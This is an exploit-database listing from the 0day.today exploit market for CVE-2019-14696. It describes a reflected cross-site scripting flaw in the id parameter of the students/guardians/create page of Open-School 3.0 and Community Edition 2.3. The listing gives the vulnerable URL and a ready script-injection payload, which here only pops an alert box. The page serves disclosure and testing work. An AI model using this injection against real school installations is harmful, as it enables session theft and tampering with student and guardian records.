[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting Vulnerability

Author
Greg.Priest
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-33093
Category
web applications
Date add
09-08-2019
CVE
CVE-2019-14696
Platform
php
Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting Vulnerability

# Exploit Author: [Greg.Priest]
# Vendor Homepage: [https://open-school.org/]
# Software Link: []
# Version: [Open-School 3.0/Community Edition 2.3]
# Tested on: [Windows/Linux ]
# CVE : [CVE-2019-14696]


Open-School 3.0, and Community Edition 2.3, allows XSS via the /index.php?r=students/guardians/create id parameter.

/index.php?r=students/guardians/create&id=1[inject JavaScript Code]

Example:
/index.php?r=students/guardians/create&id=1<script>alert("PWN3D!")</script><script>alert("PWN3D!")</script>

#  0day.today [2024-11-15]  #